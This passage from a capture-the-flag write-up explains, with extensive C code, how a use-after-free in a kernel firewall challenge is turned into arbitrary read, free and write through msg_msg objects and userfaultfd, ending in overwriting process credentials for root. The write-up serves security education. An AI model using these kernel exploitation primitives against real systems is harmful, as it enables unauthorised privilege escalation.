store_msg() first computes alen [1] (0xfd0 in our case, exactly as we saw in load_msg() and alloc_msg()) and copies that many bytes of message data from kernel space to the user buffer using copy_to_user() [2]. It then traverses the list of segments until none are left [3], recomputing alen each time [4] and copying the segment data to the user buffer [5]. In our case there is only one segment, from which 0xff8 bytes are copied.

Once the procedure is successfully completed, as we can see in the do_msgrcv() source code above (you need to scroll up a bit), it calls free_msg() [3] to deallocate the message and its respective segment:

void free_msg(struct msg_msg *msg)
{
    struct msg_msgseg *seg;

    security_msg_msg_free(msg);

    seg = msg->next;
    kfree(msg);  // [1]
    while (seg != NULL) { // [2]
    	struct msg_msgseg *tmp = seg->next;

    	cond_resched();
    	kfree(seg); // [3]
    	seg = tmp;
    }
}

free_msg() first uses kfree() to free the message itself [1], then traverses the singly linked list of segments [2], deallocating each segment with kfree() [3].

Now it is very important to note that if we call msgrcv() with the MSG_COPY flag, for example as follows:

void *memdump = malloc(0x1fc8);
msgrcv(qid, memdump, 0x1fc8, 1, IPC_NOWAIT | MSG_COPY | MSG_NOERROR);

the kernel will not destroy our message. As we can see from the do_msgrcv() source code above (again, you need to scroll up a bit), it will use prepare_copy() to allocate a temporary message [4], and then call copy_msg() to copy the content of the requested message into the copy (using memcpy()). This way, after the message has been copied to user space, the original message is preserved: it is never unlinked from the queue, and free_msg() destroys the copy instead of the original. This will be extremely important in the exploitation phase.

P.S. The MSG_COPY flag can only be used if the kernel is compiled with CONFIG_CHECKPOINT_RESTORE, which is enabled by default in many Linux distributions.

The Exploit: Out Of Bounds Read

At this point, after analyzing the code the kernel uses to perform message operations, it is quite clear how a UAF exploited by an attacker to corrupt message metadata can have catastrophic effects. In the next sections, by corrupting fields of the msg_msg structure, we will find the address of the current task in memory and overwrite its credentials with zeroes to get root privileges.

How to get arbitrary read by corrupting the m_ts field and the next field of the msg_msg structure has already been shown by the Linux kernel developer and security researcher Alexander Popov in his amazing article Four Bytes of Power: Exploiting CVE-2021-26708 in the Linux kernel. He also showed how to obtain a powerful arbitrary free primitive by exploiting the security pointer of the msg_msg structure. Unfortunately, if SELinux is disabled, as in our case, the security pointer will always be NULL.

While reading this article, we began to wonder what other primitives could be obtained from this elastic object, so we started studying the source code, and after many experiments we managed to turn it into a powerful exploitation toolkit.

Since the firewall doesn’t offer any function we can exploit to get a leak (remember, show_rule() is exposed but not implemented), we can trigger the UAF, allocate a message using msgsnd(), and corrupt its m_ts field using edit_rule() to get a powerful Out Of Bounds Read primitive when we call msgrcv():

[...]

void send_msg(int qid, int size, int c)
{
    struct msgbuf
    {
        long mtype;
        char mtext[size - 0x30];
    } msg;

    msg.mtype = 1;
    memset(msg.mtext, c, sizeof(msg.mtext));

    if (msgsnd(qid, &msg, sizeof(msg.mtext), 0) == -1)
    {
        perror("msgsnd");
        exit(1);
    }
}

[...]

// [1]
if ((qid[0] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1)
{
    perror("msgget");
    exit(1);
}

if ((qid[1] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1)
{
    perror("msgget");
    exit(1);
}

// [2]
add_rule(0, buff, INBOUND);
duplicate_rule(0, INBOUND);
delete_rule(0, INBOUND);

send_msg(qid[0], 0x40, 'A'); // [3]
send_msg(qid[1], 0x40, 'B'); // [4]
send_msg(qid[1], 0x1ff8, 0); // [5]

[...]

As we can see from the code above, first of all we create two queues using msgget() [1], we will identify the first one with QID #0 and the second one with QID #1.

Then we use add_rule() to add a valid inbound rule, which stores a pointer to the rule in firewall_rules_in; we use duplicate_rule() to duplicate it into firewall_rules_out, and then we free it using delete_rule(). Although the pointer is set to NULL in firewall_rules_in, it is still reachable through firewall_rules_out [2]. Our UAF is ready to be exploited.

At this point we can use our send_msg() function (a msgsnd() wrapper) to allocate three messages. We allocate a first message of 0x40 bytes (0x30 bytes of header and 0x10 bytes of data) in the first queue (QID #0) [3]. Since we just freed our rule, and slab freelists have LIFO behavior, it will be allocated at the same address in kmalloc-64. With this move, we have full control over the message header, the msg_msg structure.

Now we allocate two other messages in QID #1: a first message of 0x40 bytes (again, 0x30 bytes of header and 0x10 bytes of data) [4], also allocated in kmalloc-64, and a second one of 0x1ff8 bytes (0x30 bytes of header and 0x1fc8 bytes of data) [5]. At this point the situation in memory should be the following (because of freelist randomization, the first message may be allocated after the second one and our leak attempt may fail; in this case we simply need to delete the second queue and run the exploit again):

[figure: heap layout after the three msgsnd() calls]

In the diagram above, in orange, we can see the message header of the first message in QID #0. We have full control over this object via edit_rule(). Also in kmalloc-64 we can see the other 0x40-byte message, belonging to QID #1. The m_list.prev field of this message points to its message queue, QID #1, while its m_list.next field points to the second message in QID #1, the large message in kmalloc-4096. That message in turn has a pointer to a segment, also in kmalloc-4096 (we already explained in the previous section how messages larger than 0x1000 bytes, counting header plus data, are split into segments).

We are ready to get a memory leak by exploiting an Out Of Bounds Read:

[...]

void *recv_msg(int qid, size_t size)
{
    void *memdump = malloc(size);

    if (msgrcv(qid, memdump, size, 0, IPC_NOWAIT | MSG_COPY | MSG_NOERROR) == -1)
    {
        perror("msgrcv");
        return NULL;
    }

    return memdump;
}

[...]

uint64_t *arb_read(int idx, uint64_t target, size_t size, int overwrite)
{
    struct evil_msg *msg = (struct evil_msg *)malloc(0x100);

    msg->m_type =  0;
    msg->m_ts = size; // [2]

    if (overwrite)
    {
        msg->next = target;
        edit_rule(idx, (unsigned char *)msg, OUTBOUND, 0);
    }
    else
    {
        edit_rule(idx, (unsigned char *)msg, OUTBOUND, 1); // [3]
    }

    free(msg);

    return recv_msg(qid[0], size); // [4]
}

[...]

uint64_t *leak = arb_read(0, 0, 0x2000, 0); // [1]

[...]

Using the function arb_read() [1] with a size argument of 0x2000 bytes, we overwrite the m_ts field of our target object [2] thanks to edit_rule() [3]. Then, by calling recv_msg() (a msgrcv() wrapper) [4], we get a memory leak. It’s important to note that recv_msg() uses the MSG_COPY flag: by overwriting our target object we also corrupt its m_list.next and m_list.prev fields, so without MSG_COPY, do_msgrcv() would try to unlink the message from the queue, causing a crash.

[figure: target msg_msg with its m_ts field overwritten]

As we can see from the figure above, we overwrote the m_ts size field in the msg_msg structure of our target, which gives us a powerful Out Of Bounds Read primitive when we call recv_msg(). This way we can leak the m_list.next field of the message in QID #1 (the address of the large message in kmalloc-4096), the m_list.prev field (the pointer to QID #1), and finally sysfs_bin_kfops_ro. Because this symbol resides in the kernel data section, which is not affected by FGKASLR, we can use it to calculate the kernel base, or the address of any other symbol in the data section.

The Exploit: From Out Of Bounds Read To Arbitrary Read

In the previous section, among other things, we leaked the address of sysfs_bin_kfops_ro. We can use it to calculate the address of init_task, the task_struct of the first process executed by the system. In Linux, every task is described by a task_struct, and tasks are linked together in a circular doubly linked list.

In this discussion we are interested in three fields of task_struct: tasks, a structure that contains pointers to the previous and next task; pid, the process identifier; and cred, a structure that contains the credentials of the process (uid, gid, suid, sgid and so on).

[...]

uint64_t find_current_task(uint64_t init_task)
{
    pid_t pid, next_task_pid;
    uint64_t next_task;

    pid = getpid();

    printf("[+] Current task PID: %d\n", pid);
    puts("[*] Traversing tasks...");

    leak = arb_read(0, init_task + 8, 0x1500, 1) + 0x1f9;
    next_task = leak[0x298/8] - 0x298;

    leak = arb_read(0, next_task + 8, 0x1500, 1) + 0x1f9;
    next_task_pid = leak[0x398/8];

    while (next_task_pid != pid) // [2]
    {
        next_task = leak[0x298/8] - 0x298; // [3]
        leak = arb_read(0, next_task + 8, 0x2000, 1) + 0x1f9;
        next_task_pid = leak[0x398/8]; // [4]
    }

    puts("[+] Current task found!");

    return next_task;
}

[...]

puts("[*] Locating current task address...");
uint64_t current_task = find_current_task(init_task); // [1]
printf("[+] Leaked current task address: 0x%lx\n", current_task);

[...]

In the source code above, we use the function find_current_task() [1] to traverse all tasks, starting from init_task, until we find the current one [2]. To achieve this, find_current_task() calls arb_read() multiple times, overwriting the m_ts field and the next pointer of our target msg_msg object; for each task it leaks the pointer to the next task [3] and its PID [4], then compares the leaked PID with the PID of the current task until there is a match:

[figure: target msg_msg with a fake segment pointing to init_task]

In the figure above we can see that the m_ts field of our target object is now set to 0x2000 and its segment pointer points to init_task. This way, when we call msgrcv(), in store_msg() the kernel will not only copy 0xfd0 bytes from the message to the user buffer (causing another OOB Read), but will also copy 0xff8 bytes from the fake segment: init_task.

Once we have found the current task, we can use our arbitrary read primitive to leak its cred structure, overwriting the m_ts field of msg_msg with 0x2000 and the segment pointer with the address of the current task:

[...]

leak = arb_read(0, current_task, 0x2000, 1) + 0x1fa;
cred_struct = leak[0x540/8];
printf("[+] Leaked current task cred struct: 0x%lx\n", cred_struct);

[...]

[figure: leaking the cred pointer from the current task_struct]

The Exploit: Arbitrary Free

At this point we have the address of the current task and of its cred structure; now we need arbitrary write, but getting there is not so simple. First we need an arbitrary free primitive. To obtain it, we call msgrcv() (without the MSG_COPY flag) two times:

[...]

msgrcv(qid[1], memdump, 0x1ff8, 1, IPC_NOWAIT | MSG_NOERROR); // [1]
msgrcv(qid[1], memdump, 0x1ff8, 1, IPC_NOWAIT | MSG_NOERROR); // [2]

[...]

The first time we call msgrcv() [1], the kernel frees the first message (in kmalloc-64) belonging to QID #1. The second time [2], the kernel frees the second message (in kmalloc-4096) and its respective segment (also in kmalloc-4096), again belonging to QID #1. The result in memory will be the following:

[figure: heap state after both messages in QID #1 are freed]

Now, this is a very important step and can be quite confusing. In the first part of the exploit, we leaked the address of the message in kmalloc-4096. In the previous step, when we called msgrcv() for the second time, free_msg() (at the end of do_msgrcv()) first used kfree() to free the message in kmalloc-4096 and then freed its segment. Because slab freelists have LIFO behavior, and we are going to allocate a new message (in kmalloc-4096) which in turn will have a segment (also in kmalloc-4096), the new message will be allocated at the address where the segment was before, and the new segment at the address where the message was before.

In other words, since we previously leaked the address of the message in kmalloc-4096, and the positions are swapped when we free (with msgrcv()) and re-allocate (with msgsnd()), what we actually know after re-allocating is the address of the new segment in kmalloc-4096. For a visual representation, let’s say that we initially leaked the address of the green square:

[figure: message and segment positions swapped after reallocation]

Now that we have clarified this important point, we can use pthread to allocate a new message and its respective segment in kmalloc-4096:

[...]

void *allocate_msg1(void *_)
{
    printf("[Thread 1] Message buffer allocated at 0x%lx\n", page_1 + PAGE_SIZE - 0x10);

    if ((qid[2] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1) // [2]
    {
        perror("msgget");
        exit(1);
    }

    memset(page_1, 0, PAGE_SIZE);
    ((unsigned long *)(page_1))[0xff0 / 8] = 1;

    if (msgsnd(qid[2], page_1 + PAGE_SIZE - 0x10, 0x1ff8 - 0x30, 0) < 0) // [3]
    {
        puts("msgsend failed!");
        perror("msgsnd");
        exit(1);
    }

    puts("[Thread 1] Message sent, *next overwritten!");
}

[...]

pthread_create(&tid[2], NULL, allocate_msg1, NULL); // [1]

[...]

As we can see from the code above, we create a new thread using pthread [1]. In the allocate_msg1() function, we first create a new queue [2], QID #2, then we use msgsnd() [3] to send a message of 0x1ff8 bytes (0x30 bytes of header and 0x1fc8 bytes of data), which in kernel space results in a 0x1000-byte message (0x30 bytes of header and 0xfd0 bytes of data) in kmalloc-4096 and a 0x1000-byte segment (0x8 bytes for the next pointer and 0xff8 bytes of data), also in kmalloc-4096.

The location page_1 + PAGE_SIZE - 0x10 is not random: we use userfaultfd to monitor the page at page_1 + PAGE_SIZE, waiting for a page fault. This way, when load_msg() tries to copy our message from user space into kernel space, it causes a page fault, and we can hang the call to copy_from_user(). This results in the following situation (remember that we now know the address of the new segment, for the reasons explained above):

[figure: new message in QID #2 hanging in load_msg() on the faulting page]

Finally we are ready to use our powerful arbitrary free primitive:

[...]

void arb_free(int idx, uint64_t target)
{
    struct evil_msg *msg = (struct evil_msg *)malloc(0x100);
    void *memdump = malloc(0x2000);

    msg->m_list.next = queue; // [2]
    msg->m_list.prev = queue;
    msg->m_type =  1;
    msg->m_ts = 0x10;
    msg->next = target; // [3]

    edit_rule(idx, (unsigned char *)msg, OUTBOUND, 0); // [4]

    puts("[*] Triggering arb free...");
    msgrcv(qid[0], memdump, 0x10, 1, IPC_NOWAIT | MSG_NOERROR); // [5]
    puts("[+] Target freed!");

    free(memdump);
    free(msg);
}

[...]

arb_free(0, large_msg); // [1]

[...]

We call the function arb_free() [1], targeting the previously leaked message object, which now contains the new segment. We use the message queue address leaked in the first part of the exploit to fix up the m_list.next and m_list.prev fields of the msg_msg structure [2]; this allows us to call msgrcv() on the message in QID #0 without the MSG_COPY flag, freeing it without crashing the kernel during the unlinking procedure. Then we set the next pointer (the pointer to the segment) to our target [3], the new segment in kmalloc-4096.

When we use edit_rule() to overwrite msg_msg [4] the situation in memory will be the following:

[figure: msg_msg in QID #0 after the overwrite via edit_rule()]

Now we can finally call msgrcv() without the MSG_COPY flag [5]. The kernel unlinks the message from the queue and then calls free_msg(), freeing both the message in QID #0 and the new segment:

[figure: message in QID #0 and the targeted segment freed]

The Exploit: From Arbitrary Free To Arbitrary Write

Now the next pointer of our message in kmalloc-4096 points to a free object (the one we just freed with our powerful arbitrary free primitive). We can create a new thread using pthread and allocate another message in kmalloc-4096:

[...]

void *allocate_msg2(void *_)
{
    printf("[Thread 2] Message buffer allocated at 0x%lx\n", page_2 + PAGE_SIZE - 0x10);

    if ((qid[3] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1) // [2]
    {
        perror("msgget");
        exit(1);
    }

    memset(page_2, 0, PAGE_SIZE);
    ((unsigned long *)(page_2))[0xff0 / 8] = 1;

    if (msgsnd(qid[3], page_2 + PAGE_SIZE - 0x10, 0x1028 - 0x30, 0) < 0) // [3]
    {
        puts("msgsend failed!");
        perror("msgsnd");
        exit(1);
    }

    puts("[Thread 2] Message sent, target overwritten!");
}

[...]

pthread_create(&tid[3], NULL, allocate_msg2, NULL); // [1]

[...]

As we did before, we create a new thread [1]; in allocate_msg2() we create another queue, QID #3 [2], and use msgsnd() to send a 0x1028-byte message [3] (0x30 bytes of header and 0xff8 bytes of data). In kernel space this results in a 0x1000-byte message (0x30 bytes of header and 0xfd0 bytes of data), which will be allocated at the same address as the segment we freed with our arbitrary free primitive, and a 0x30-byte segment (0x8 bytes for the next pointer and 0x28 bytes of data), which will be allocated in kmalloc-64. This time too, our buffer is located at page_2 + PAGE_SIZE - 0x10, because we are monitoring page_2 + PAGE_SIZE with another userfaultfd thread, waiting for a page fault. Exactly as before, when load_msg() tries to copy our message into kernel space, it causes a page fault and we can hang the copy_from_user() call.

When the call to load_msg() hits our monitored page, we end up in the following situation:

[figure: second message in QID #3 hanging in load_msg()]

At this point, we can finally release the first faulting thread; this allows us to overwrite the next pointer of the message we just allocated in kmalloc-4096 with the address of the current task’s cred structure minus 0x8 bytes:

[...]

        if (page_fault_location == page_1 + PAGE_SIZE)
        {
            printf("[PFH 1] Page fault at 0x%lx\n", page_fault_location);
            memset(buff, 0, PAGE_SIZE);

            puts("[PFH 1] Releasing faulting thread");

            struct evil_msg *msg = (struct evil_msg *)(buff + 0x1000 - 0x40);

            msg->m_type =  0x1;
            msg->m_ts = 0x1000;
            msg->next = (uint64_t)(cred_struct - 0x8); // [1]

            ufd_copy.dst = (unsigned long)(page_fault_location);
            ufd_copy.src = (unsigned long)(&buff);
            ufd_copy.len = PAGE_SIZE;
            ufd_copy.mode = 0;
            ufd_copy.copy = 0;

            for (;;)
            {
                if (release_pfh_1)
                {
                    if (ioctl(ufd, UFFDIO_COPY, &ufd_copy) < 0)
                    {
                        perror("ioctl(UFFDIO_COPY)");
                        exit(1);
                    }

                    puts("[PFH 1] Faulting thread released");
                    break;
                }
            }
        }

[...]

It’s important to note that we subtract 8 bytes [1] because we need the first QWORD of the fake segment to be NULL; otherwise load_msg() would try to access the next segment, causing a crash. Once we release the faulting thread, this is how the memory will look:

[figure: next pointer of the QID #3 message redirected to the cred structure]

As we can see from the diagram above, the next pointer of the message in QID #3 now points to the cred structure of the current task. We have finally reached the end; the last step is predictable: we release the second faulting thread, overwriting the credentials of the current process with zeroes. This gives us root privileges:

[figure: credentials of the current process overwritten with zeroes]

Here is the exploit in action:

[video: exploit demo]

Here you can find the complete exploit: wall_of_perdition_exploit.c

Conclusion

The technique described in the previous sections is applicable to many caches, from kmalloc-64 up to kmalloc-4096. In the specific case of kmalloc-4096, exploitation turns out to be simpler; to learn more, I recommend reading the awesome writeup of Fire of Salvation by FizzBuzz101. It is worth noting that in a less protected environment, such as a common Linux distribution (with CONFIG_STATIC_USERMODEHELPER unset, without FGKASLR, and so on), you can simplify the technique by targeting modprobe_path, core_pattern, etc., instead of the current task’s credentials. For any question or clarification feel free to contact me (check About).

Challenges links: Fire of Salvation / Wall of Perdition

References

SMAP / SMEP

FGKASLR

NetFilter

CVE-2021-26708 by a13xp0p0v